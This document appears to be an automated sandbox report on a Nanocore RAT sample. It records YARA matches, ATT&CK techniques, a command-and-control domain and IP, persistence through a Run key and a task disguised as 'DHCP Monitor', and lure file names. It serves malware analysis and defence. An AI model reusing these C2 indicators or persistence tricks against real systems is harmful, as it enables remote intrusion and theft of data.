Code function: 0_2_001ACBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

0_2_001ACBB8

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0084E284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

8_2_0084E284

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_008A2BF9 GetUserNameW,

8_2_008A2BF9

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_0019A995 GetVersionExW,

0_2_0019A995

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR

Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XP
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XPe
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_VISTA
Source: mmuiqlcvwo.pif.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_7
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_8

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: mmuiqlcvwo.pif, 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0089C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	8_2_0089C06C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008A65D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	8_2_008A65D3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00894EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	8_2_00894EFB

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts2	Native API1	DLL Side-Loading1	Exploitation for Privilege Escalation1	Disable or Modify Tools11	Input Capture31	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter2	Valid Accounts2	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture31	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Valid Accounts2	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Access Token Manipulation21	Software Packing12	NTDS	System Information Discovery36	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection312	DLL Side-Loading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Scheduled Task/Job1	Masquerading11	Cached Domain Credentials	Security Software Discovery121	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol21	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Valid Accounts2	DCSync	Virtualization/Sandbox Evasion31	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion31	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation21	/etc/passwd and /etc/shadow	Application Window Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection312	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
YdACOWCggQ.exe	35%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\33920049\mmuiqlcvwo.pif	27%	Virustotal	Browse
C:\Users\user\33920049\mmuiqlcvwo.pif	32%	ReversingLabs
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
14.2.RegSvcs.exe.6290000.8.unpack	100%	Avira	TR/NanoCore.fadte		Download File
14.2.RegSvcs.exe.1300000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7		Download File

Domains

Source	Detection	Scanner	Label	Link
ezeani.duckdns.org	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://secure.globalsign.net/cacert/PrimObject.crt0	0%	URL Reputation	safe
http://secure.globalsign.net/cacert/ObjectSign.crt09	0%	URL Reputation	safe
http://www.globalsign.net/repository09	0%	URL Reputation	safe
ezeani.duckdns.org	1%	Virustotal		Browse
ezeani.duckdns.org	0%	Avira URL Cloud	safe
194.5.98.48	1%	Virustotal		Browse
194.5.98.48	0%	Avira URL Cloud	safe
http://www.globalsign.net/repository/0	0%	URL Reputation	safe
http://www.globalsign.net/repository/03	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ezeani.duckdns.org	194.5.98.48	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
ezeani.duckdns.org	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
194.5.98.48	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://secure.globalsign.net/cacert/PrimObject.crt0	mmuiqlcvwo.pif.0.dr	false	URL Reputation: safe	unknown
http://secure.globalsign.net/cacert/ObjectSign.crt09	mmuiqlcvwo.pif.0.dr	false	URL Reputation: safe	unknown
http://www.globalsign.net/repository09	mmuiqlcvwo.pif.0.dr	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/0	mmuiqlcvwo.pif.0.dr	false		high
http://www.globalsign.net/repository/0	mmuiqlcvwo.pif.0.dr	false	URL Reputation: safe	unknown
http://www.globalsign.net/repository/03	mmuiqlcvwo.pif.0.dr	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.98.48	ezeani.duckdns.org	Netherlands		208476	DANILENKODE	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	501907
Start date:	13.10.2021
Start time:	11:58:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	YdACOWCggQ.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/36@23/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 23.6% (good quality ratio 22.4%) Quality average: 74.6% Quality standard deviation: 28.1%
HCA Information:	Successful, ratio: 55% Number of executed functions: 170 Number of non-executed functions: 211
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, rundll32.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 95.100.216.89, 20.49.157.6, 20.82.209.183, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:59:55	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows element C:\Users\user~1\33920049\MMUIQL~1.PIF C:\Users\user~1\33920049\fmkkelc.omp
12:00:00	Task Scheduler	Run new task: DHCP Monitor path: "C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
12:00:00	API Interceptor	1890x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
194.5.98.48	Import order764536.xlsx	Get hash	malicious	Browse
	Bill of Lading, Invoice, & Packing LIsts.exe	Get hash	malicious	Browse
	Quotation Price - Double R Trading b.v.exe	Get hash	malicious	Browse
	Nizi International S.A. #New Order.exe	Get hash	malicious	Browse
	DHL Import Clearance #U2013 Consignment #6225954602.exe	Get hash	malicious	Browse
	soa5.exe	Get hash	malicious	Browse
	soa5.exe	Get hash	malicious	Browse
	PO SKP 149684.jar	Get hash	malicious	Browse
	TECHNICAL OFFERS.exe	Get hash	malicious	Browse
	17New P.O_signed.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ezeani.duckdns.org	Import order764536.xlsx	Get hash	malicious	Browse	194.5.98.48

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	Import order764536.xlsx	Get hash	malicious	Browse	194.5.98.48
	swift.Telex.xls	Get hash	malicious	Browse	194.5.98.95
	details.vbs	Get hash	malicious	Browse	194.5.98.206
	TWAueCcfK3.exe	Get hash	malicious	Browse	194.5.98.107
	DHL_1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Enquiry- 0076HGF21.exe	Get hash	malicious	Browse	194.5.98.141
	DHL_1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	AWB# 2617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Product-inquiry6243424243_PDF.exe	Get hash	malicious	Browse	194.5.98.211
	Charter Details.vbs	Get hash	malicious	Browse	194.5.98.184
	VHp0AIIlQG.exe	Get hash	malicious	Browse	194.5.98.107
	Product-inquiry6243424243PDF.exe	Get hash	malicious	Browse	194.5.98.211
	Yeni Sipari#U015f # 765-3523663, pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Nuevo pedido _WJO-001,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	765-3523663 ,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Zhgafxcfrzzlbcdvuklhrmxvmcufzxktju.exe	Get hash	malicious	Browse	194.5.98.145
	Zhgafxcfrzzlbcdvuklhrmxvmcufzxktju.exe	Get hash	malicious	Browse	194.5.98.145
	Yfqbmuahufznqznknlmwfrtnauqppwcobt.exe	Get hash	malicious	Browse	194.5.98.145
	BIOBARICA OC CVE6535 TVOP-MIO 10(C) 2021,pdf..exe	Get hash	malicious	Browse	194.5.97.25

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Swift copy.exe	Get hash	malicious	Browse
	KRSEL0000056286.JPG.exe	Get hash	malicious	Browse
	tT5M57z8XiwLwf5.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Suspicious.Win32.Save.a.7200.exe	Get hash	malicious	Browse
	Purchase order.exe	Get hash	malicious	Browse
	21ITQXL080104122T7.exe	Get hash	malicious	Browse
	COSCOSH SHANGHAI SHIP MANAGEMENT CO LTD.exe	Get hash	malicious	Browse
	319-7359-01#U00a0BL#U00a0DRAFT.exe	Get hash	malicious	Browse
	HSBc20210216B1.exe	Get hash	malicious	Browse
	BANK INFORMATION.exe	Get hash	malicious	Browse
	PO.2100002.exe	Get hash	malicious	Browse
	dorlla.exe	Get hash	malicious	Browse
	dAkJsQr7A9.exe	Get hash	malicious	Browse
	QT2021154 NCX Glasurit Rev.1.exe	Get hash	malicious	Browse
	Order specification & Drawing_PDF.exe	Get hash	malicious	Browse
	payment.exe	Get hash	malicious	Browse
	SWIFT CODE.exe	Get hash	malicious	Browse
	SWIFT CODE.exe	Get hash	malicious	Browse
	TRANSFER REQUEST FORM.exe	Get hash	malicious	Browse
	swift code.exe	Get hash	malicious	Browse
C:\Users\user\33920049\mmuiqlcvwo.pif	Import order764536.xlsx	Get hash	malicious	Browse
C:\Users\user\33920049\mmuiqlcvwo.pif	KRSEL0000056286.JPG.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\33920049\aauo.exe Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.6047097806645825
Encrypted:	false
SSDEEP:	12:o9RRQXCGiB+IGihOZEkUYz8laDkucQq1wA3RT8jTW:oPRuCh8OEZEdwkucZ1w2T8jS
MD5:	3A48081CF7D4D709399A376B3A8AADF2
SHA1:	E0D7DDAA464FC3565D92DF4ECC7BD30286D519CA
SHA-256:	7EBB903522348C2326DFFBC66B5D20C8E7C120C4D7CEE15640CAE5187C5741C0
SHA-512:	4B0077AD1E29FC4C7703B7525167ABB1A80E409D7E4685EA977689B3DE12CF5CFA02BB843D62E1EA391F18FF4C609D66262116E01B52C59616E3A266F0E40726
Malicious:	false
Reputation:	low
Preview:	7Wq2t660muPw9Ke6505108Nqr733V3ey4715Mnl1tK584..xy2u6f8997C1l72Xc9877f5666UgJI88f50gM5PSiht354AzpPmC0fL6TsXG1K41vO4Dkm9..46tjB20c7LBG210W860g694jFP6918666lmHe1c7XI71YIljgi5hp12J0oQ690a15cD60yD7KVgw047u4j6A41klBxn2Ok2L386Lb22mMFoB69F2..P213L3BW17Qa6OT37d10A3N36J105N6dvVEJiz4h0aj833P18x910LvnZ655s06IFlBf63Gu5HKO28ErrHC5b09mo2vq..z4D72VM..Sz42896scdb7kPgw0qW6q81vF8..0D5lF..m4zAR10BO6Yk8M..5BGR826P42tCT1t73Hk261Pcqliz7AoTir59j..661Qb74gOprMNMaV9FBPR0TzEQ6H92poW22LHCzotRBEn3R97T2So4F0113007zgj459pt6JBRy1w4p8HlK..

C:\Users\user\33920049\abjtjj.gcm Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	416786
Entropy (8bit):	4.0000117868606
Encrypted:	false
SSDEEP:	6144:vq8GcfPnL6mYkonW8inBO9SEmDafe/kgtwIf:vecfPemYZWJs9NmDaW8gmG
MD5:	1E44C5E2D839F53AC114916DFA41912B
SHA1:	9B67ABC94E2959683B5D784C8B076D6171AF7237
SHA-256:	0FB93824D410F1E4BA2B233F405027D042EDF2E729FA34A41BE910B50ED99416
SHA-512:	14895D2F67585415D7D25807BBA20F6AA8C142E8DD3483ED8E10F4280820CD0849EE828E3134BEAF4A90FB8E41C9C524DF01547330DFD3928470B3EEB95946A1
Malicious:	false
